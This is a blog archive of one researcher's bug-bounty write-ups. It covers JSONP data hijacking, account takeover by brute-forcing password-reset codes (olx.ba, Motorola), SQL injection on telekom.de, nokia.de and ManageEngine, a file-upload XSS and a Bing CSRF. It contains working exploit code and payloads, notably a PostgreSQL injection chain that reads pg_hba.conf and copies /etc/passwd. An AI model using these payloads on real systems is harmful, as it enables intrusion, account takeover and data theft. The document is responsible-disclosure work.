https://medium.com/@maxon3/reflected-dom-xss-and-clickjacking-on-https-silvergoldbull-de-bt-html-daa36bdf7bf0
-
JSONP wraps up a JSON response into a JavaScript function and sends that back as a Script to the browser. A script is not subject to the Same Origin Policy and when loaded into the client, the function acts just like the JSON object that it contains.In general, this policy states that, if protocol (like http), Port number (like 80) and host (like example.com) is different from where data is being requested, it should not be permitted.But HTML <script> element is allowed to perform content retrieval from foreign origins.
So lets talk about vulnerability inside popular social network in USA, with more than million users per day. Users can set images to private aka "Only me" , but thanks to JSONP whenever user visits his album, request is sent to api and image links are wrapped in callback function, like this:
http://api.example.com/photoselect?callback=userPhotos
with response type set to application/javascript .Thanks to <script> freedom with SOP we can hijack this info and see private images. Lets see what response we get:userPhotos({"imageData":[{"imageId":617115519,"miniPath":"thumb_userimages\/mini\/2015\/11\/06\/1306\/thm_phpaebstx.jpg"},{"imageId":787725877,"miniPath":"thumb_userimages\/mini\/2016\/11\/15\/0706\/thm_phpa9iRVR.png"},{"imageId":539201026,"miniPath":"thumb_userimages\/mini\/2015\/02\/05\/15\/thm_php7DuF7V.jpg"},{"imageId":450159923,"miniPath":"thumb_userimages\/mini\/2014\/04\/16\/17\/thm_phpnYEEgn.png"},{"imageId":439606407,"miniPath":"thumb_userimages\/mini\/2014\/03\/13\/09\/thm_php6f9wmz.jpg"}],"success":true});
So we get id of images, and locations of images on server. Now lets make an exploit POC.
<!DOCTYPE html>
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta charset="utf-8">
<title>User images information leak PoC</title>
<style>
</style>
<style type="text/css"></style></head>
<body>
<h1>User images information leak PoC</h1>
<h2>Link for user images:</h2>
<pre id="output">Loading…</pre>
<script>
function hijackData(data) {
var data = JSON.stringify(data, undefined, 2);
document.getElementById('output').innerHTML = data;
}
</script>
<script src="http://api.example.com/photoselect?callback=hijackData"></script></body></html>The result when victim visits page:So thanks to JSONP and <script> we can get links to private user images if victim visits our page. Steps:
1. User visits our page.
2. Our page uses <script> and sends request to site API with our callback function.3. API responds with image id and image links4. We use JSON.stringify to format reply properly and document.write to write it to the page.
5. User images are hijacked.
Let’s talk about fix:0Dodajte komentar
-
Olx.ba (pre pik.ba) je najveca kupoprodajna mreza u BiH, i najposjeceniji sajt u BiH. Neki od podataka su :
– OLX.ba dnevno posjećuje više od 500.000 posjetitelja;
– Mjesečni broj otvaranja stranica prelazi brojku od 700 miliona;
– Broj uređaja koji mjesečno posjete OLX je veći od 5 miliona;
– Svaki posjetitelj prosječno otvori više od 40 stranica pri svakoj posjeti;
– Prosječan broj dnevnih objava novih artikala je veći od 40.000;
– Svakog dana kupoprodajna zajednica je veća za više od 800 novih korisnika;
Iako administracija sajta vodi racuna o sigurnosti korisnika propusti ipak postoje , i danas cemo govoriti o jednom veoma ozbiljnom, koji omogucava napadacu da preuzme vas olx.ba racuna. Ovaj napad cemo podijeliti u par koraka.
1. Pokretanje resetovanja passworda
Prva faza je pokretanje reseta passworda i za nju nam je potreban ili email korisnika ili broj telefona koji je registrovan na olx.ba.
Nazalost email nam cesto nece biti dostupan, ali broj telefona je vidljiv na dosta racuna na olx.ba, kada posjetite racun korisnika, na desnoj strani se nalazi opcija da vidite broj telefona.
Sada kada imamo broj telefona, unesemo ga u polje formulara za resetovanje lozinke i kliknemo na "Posalji novu sifru". Preporuka je da ukoliko ovo radite, radite to u kasnim vecernjim satima, kada je manja sansa da ce korisnika da reaguje na poruku za resetovanje lozinke.2. Otkrivanje reset lozinke preko mobilne aplikacijeLozinka koju ce korisnik dobiti se sastoji samo od brojeva i to od 100000 do 999999. Sto znaci da ce napadac da pokusa da pronadje pravu reset lozinku i da se uloguje na racun. Ovaj napad se zove bruteforce, tj pokusaj pronalazenja prave lozinke slanjem svake moguce kombinacije lozinke i citanjem odgovora sa servera. Ukoliko je lozinka pogresna server ce odgovoriti na jedan nacin, ukoliko je tacna server ce odgovoriti na drugi nacin.
Ukoliko pokusate ovaj napad na web verziji olx.ba nakon par pokusaja server ce blokirati napad i ispisace poruku da ste previse puta unijeli pogresnu lozinku i da treba da cekate par minuta pre nego sto pokusate ponovo. Server je detektovao napad i web stranica olx.ba nije ranjiva. Bravo za web developere.
Ali, ukoliko web aplikacija nije, da li je mobilna aplikacija isto zasticena?
Nazalost nije, problem je sto web aplikacija i mobilna aplikacija koriste razliciti endpoint tj. podaci se obradjuju na jednoj lokaciji za web a na drugoj za mobilne aplikacije. Mi cemo se baviti endpointom za mobilne aplikacije. Podesavanjem na telefonu i na racunaru mozemo da pratimo zahtjeve olx.ba android aplikacije.
Pogresan login.
Tacan login.
Mobilna aplikacija nema bruteforce zastitu i mozemo da isprobamo sve kombinacije reset lozinke i tako dodjemo do validnog i preuzmemo racun korisnika. Iako za bruteforce treba vremena, sa par racunara ili manjom mrezom brzina se povecava.
Primjer bruteforce preko BurpSuite alata:
Kao sto vidite zahtjev broj 1994 je true sto znaci da smo pronasli pravi login i sada mozemo da preuzmemo racun.
Da rezimiramo:
1. Napadac unese zrtvin email ili broj telefona koji je povezan sa olx.ba i pokrene resetovanje lozinke.
2. Generise se reset loznika koja se sastoji od 6 brojeva od 100000 do 999999.
3. Napadac koristi bruteforce da pronadje pravu lozinku i da se uloguje na zrtvin racun.
4. Kada prava lonzinka bude pronadjena napadac moze da preuzme zrtvin racun.
Moj savjet je da svoje brojeve telefona na olx.ba staviti na privatno i da ih samo vi mozete vidjeti.
Savjet za olx.ba administraciju, koristiti mjesavinu brojeva i slova za reset lozniku, time cete uciniti napada daleko tezim jer ce premutacije mogucih lozinki biti daleko vece.
Ovaj propust je popravljen od strane olx.ba administracije u veoma kratkom roku. Sve pohvale za azurnost i brigu o sigurnosti korisnika.
Niste sigurni da li je vasa aplikacija web ili mobilna aplikacija sigurna.
Angazujte mene da provjerim: maxonebt4@gmail.com
Danijel Maksimovic
Application Security Analyst
0Dodajte komentar
-
Few months ago I reported an sql injection inside one of telekom.de subdomains. Subdomain crp.telekom.de was vulnerable to sql injection, but I couldn't have exploited it if there wasn't for php backup files on server.Subdomain was simple, only login for and all my attempts to sql inject that form failed, so I started dirbuster to see if there are some other files. During my reconnaissance phase I found that there is index.php_old file on server, and when you visit it, you can read entire php code. While reading it I found mysql query:So I tried and the result:A little bit of burp to make better poc:Real data extracted:And report has been sent:Bug was fixed very fast, I got rewarded in a week and I can say that telekom.de security team is always great with response time, fix and rewards. I had some more sql injections on telekom, so I'll blog more when I find free time.0
Dodajte komentar
-
Nokia.de subdomains online.shop.de and pos-shop.nokia.de were vulnerable to blind SQL injection.This bug was reported to Microsoft on 5/13/2015 and they fixed is by shutting down subdomains mentioned in this post, and
never responded(got reply 2 days after this post).
Acknowledged in December 2015 list:
https://technet.microsoft.com/en-us/security/cc308589.aspxSimple true/false test showed that app is communicating with database:True: http://pos-shop.nokia.de/list/
8/3 and 1=1 (page loads)
False: http://pos-shop.nokia.de/list/8/3 and 1=0 (blank loads)
From here it was just usual blind SQL injection, and since there is awesome sqlmap tool, database was compromised:
But I did play with it without sqlmap :D
0Dodajte komentar
-
This is a bug that got me into Security Researcher Acknowledgments for Microsoft Online Services for May 2015. So lets start.
Subdomain https://borntolearn.mslearn.net/ is Microsoft training and certification community and when you visit your profile page and click on Activity section there is an option to upload some files.
Most of files were treated as attachments, but not video files. So I uploaded swf file which is basically media file (Flash Movie) and it got executed in browser.And it is fixed now.0Dodajte komentar
-
Little about company and product :
ManageEngine simplifies IT management with affordable software that offers the ease of use SMBs need and the powerful features the largest enterprises demand. More than 90,000 companies around the world - including three of every five Fortune 500 companies - trust our products to manage their networks and data centers, business applications, and IT services and security. Another 300,000-plus admins optimize their IT using the free editions of ManageEngine products.
ManageEngine® Applications Manager is a comprehensive application monitoring software used to monitor heterogeneous business applications such as web applications, application servers, web servers, databases, network services, systems, virtual systems, cloud resources, etc. It provides remote business management to the applications or resources in the network. It is a powerful tool for system and network administrators, helping them monitor any number of applications or services running in the network without much manual effort.
Now back to business. There is a very dangerous sql injection that could allow user to write to server and eventually overwrite existing scripts which could lead to remote code execution.
Vulnerability lies inside reports generator on this link :
http://site.com/showReports.do?actionMethod=generateIndividualGlanceReport&resid=10[sql injection].
Company is using 'postgres' user account as default on demo.appmanager.com.
I will lead you through how you can exploit this , and extract valuable data with error based injection.
1. Get data directory location.
SHORT EXPL:The "directory where postgresql will keep all databases" (and configuration) is called "data directory"and corresponds to what postgresql calls (a little confusingly) a "database cluster" (not related to distributed computing - it just means a group of databases and related objects managed by a postgresql server).
http://site.com/showReports.do?actionMethod=generateIndividualGlanceReport&resid=10'and/**/1=cast((SeLeCT current_setting('data_directory')) as int)--
2. Get location of hba file location
SHORT EXPL: Client authentication is controlled by a configuration file, which traditionally is named pg_hba.conf and is stored in the database cluster's data directory. (HBA stands for host-based authentication.) A default pg_hba.conf file is installed when the data directory is initialized by initdb. It is possible to place the authentication configuration file elsewhere, however; see the hba_file configuration parameter.
http://site.com/showReports.do
?actionMethod=generateIndividualGlanceReport&resid=10'and/**/1=cast((SeLeCT current_setting('hba_file')) as int)--
3. Read pg_ident.conf or pg_hba.conf
SHORT EXPL: Username maps are defined in the ident map file, which by default is named pg_ident.conf and is stored in the cluster's data directory. (It is possible to place the map file elsewhere, however; see the ident_file configuration parameter.)
http://site.com/showReports.do?actionMethod=generateIndividualGlanceReport
&resid=10'and/**/1=cast((SELECT pg_read_file('pg_hba.conf',0,10000000)) as int)--
4. Write list of databases to writable location :
NOTE: I decided to write to flash folder just so that I'm sure I wont overwrite anything important since there isn't anything important in that folder. You can construct file path location with command 1 or 2 on this list.
http://site.com/showReports.do?actionMethod=generateIndividualGlanceReport&resid=10';copy (SELECT datname FROM pg_database) to '/home/appmanager/demo/11900/AppManager11/working/flash/databases.txt';--
5. Write list of tables to writable location :
http://site.com/showReports.do?actionMethod=generateIndividualGlanceReport&resid=10'; copy (SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('r','') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid)) to '/home/appmanager/demo/11900/AppManager11/working/flash/tables.txt';--
5. Write list of columns to writable location ;
http://site.com/showReports.do?actionMethod=generateIndividualGlanceReport&resid=10'; copy (SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE 'public')) to '/home/appmanager/demo/11900/AppManager11/working/flash/columns.txt';--
6. Write contents of etc/passwd to writable location ;
http://site.com/showReports.do?actionMethod=generateIndividualGlanceReport&resid=10';DROP TABLE IF EXISTS mydats;CREATE TABLE mydats(t text); COPY mydats FROM '/etc/passwd'; copy (SELECT t FROM mydata) to '/home/appmanager/demo/11900/AppManager11/working/flash/etcpassw.txt';--
This vulnerability has been reported one month ago but I don't think they really consider it dangerous.One can also write to jsp file or create function and escalate this to RCE.
Danijel Maksimovic @maxon3
Bosnia and Herzegovina
LinkedIn
maxonebt4@gmail.com
1Prikaz komentara
-
This bug was reported on February 23rd and it was fixed within few hours, so well done Motorola.So this is how it was; A friend of mine sent me a picture that one of his friends posted where that person got some cool stuff from Motorola , it looked like he got a phone for some serious bug.So I thought why not give it a chance , and see what I can find. My first randomly chosen target was membership.motorola.com.That day I was reading about password reset vulnerability on etsy.com , so decided to test for that bug first.First we go to : https://membership.motorola.com/ExtranetRegistration/PasswordReminder.do
There we can input user id , which we choose when we register :
So for this test I registered user id "kjkszpj" (popular game cheat code :D ) , and requested password reset for that user id.
After that url is sent to email connected to that user id :
https://membership.motorola.com/ExtranetRegistration/resetPassword.do?id=kjkszpj&a= [reset code]
All we need to do now is to bruteforce "a" get parameter in password reset link , which is only protection. POST request params go like this :userID=kjkszpj&activationCode=12520113&newPassword=&confirmPassword=&submit.x=49&submit.y=9
Attack steps :
1. Initiate password reset for our account.
2. Open password reset link.
3. Change "id" value in reset pass link to account we want to hack , and set new password.
4. Intercept reset request in Burpsuite (or any other proxy tool).
5. Bruteforce "activationCode" untill you get right one.
6. Login with new password to victims account.
And video POC : https://www.youtube.com/watch?v=tUjsJTHWp_I&feature=youtu.be0Dodajte komentar
-
Few days ago I was doing some php development through some videos , and there was a part that included some code with bing webmaster api , so I had to get API key.
So I did some check and noticed that there was no CSRF token inside this location https://ssl.bing.com/webmaster/home/api.
It says :
Lost or Compromised API Key?
Do not give out your API key to any 3rd party or anyone you do not trust. If you feel the key has been compromised or used by an unauthorized party you can create a new key by deleting your current one and clicking generate. Note that if you delete your key all applications tied with this key will no longer function and need to be updated with the new API key that was generated for you.
( http://msdn.microsoft.com/en-us/library/hh969388 )You could use CSRF to delete or change users api key.
Delete api key :
<form id="deleteform" name="delete" action="https://ssl.bing.com/webmaster/svc/Webmaster.svc/ " method="post" target="maxa">DeleteApiKey <input type="hidden" name="test" value="{}">
<input type="submit" name="submit" id="submit" value="Delete Key "/></form>
Generate new api key<form id="changeform" name="change" action="https://ssl.bing.com/webmaster/svc/Webmaster.svc/ " method="post" target="maxa">GenerateApiKey <input type="hidden" name="test" value="{}">
<input type="submit" name="submit" id="submit" value="Change Key"/></form>
And that is how I got into Microsoft May 2014 Acknowledgment page.
0Dodajte komentar
Dodajte komentar